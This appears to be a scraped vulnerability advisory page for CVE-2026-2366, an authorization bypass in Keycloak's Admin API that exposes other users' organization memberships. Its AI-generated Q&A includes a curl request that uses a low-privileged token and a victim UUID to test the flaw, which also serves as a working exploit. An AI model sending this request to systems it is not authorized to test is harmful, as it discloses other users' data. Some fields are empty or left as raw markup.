CVE-2026-2366
Authorization Bypass in Keycloak Admin API Enables Data Disclosure
Publication date: 2026-03-12
Last updated on: 2026-04-02
Assigner: Red Hat, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| keycloak | keycloak | 26.5.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-2366 is an information disclosure vulnerability in Keycloak's Admin API caused by an authorization bypass."}, {'type': 'paragraph', 'content': "Specifically, the API endpoint that lists the organizations a user belongs to does not properly check permissions, allowing any authenticated userβeven those without administrative privilegesβto see the organization memberships of other users if they know the victim's unique identifier (UUID)."}, {'type': 'paragraph', 'content': 'This occurs when the Organizations feature is enabled in Keycloak, and the attacker has a valid access token but lacks the necessary admin roles.'}] [1]
How can this vulnerability impact me? :
This vulnerability allows unauthorized users to obtain information about which organizations other users belong to within Keycloak.
While it does not allow modification or deletion of data, it results in a confidentiality breach by exposing potentially sensitive organizational membership information.
Such information disclosure could be leveraged for further targeted attacks or social engineering.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by attempting to access the vulnerable Admin API endpoint with a low-privileged authenticated user token and checking if organization membership information of other users is disclosed.'}, {'type': 'list_item', 'content': 'Ensure the Organizations feature is enabled in Keycloak.'}, {'type': 'list_item', 'content': 'Obtain a valid OIDC access token for a low-privileged user.'}, {'type': 'list_item', 'content': 'Perform a GET request to the endpoint `/admin/realms/{realm}/organizations/members/{victim-uuid}/organizations` replacing `{realm}` and `{victim-uuid}` with appropriate values.'}, {'type': 'list_item', 'content': 'If the response is HTTP 200 OK and returns the victimβs organization memberships, the vulnerability is present.'}, {'type': 'paragraph', 'content': 'Example curl command to test the vulnerability:'}, {'type': 'list_item', 'content': 'curl -H "Authorization: Bearer <low-privileged-user-token>" https://<keycloak-server>/admin/realms/<realm>/organizations/members/<victim-uuid>/organizations'}] [1]
What immediate steps should I take to mitigate this vulnerability?
Currently, no patch is available for this vulnerability.
Immediate mitigation steps include:
- Restrict access to the Keycloak Admin API to only trusted and necessary users.
- Limit or disable the Organizations feature if it is not required.
- Monitor and audit API access logs for suspicious requests to the vulnerable endpoint.
- Ensure that UUIDs of users are not easily guessable or exposed to unauthorized users.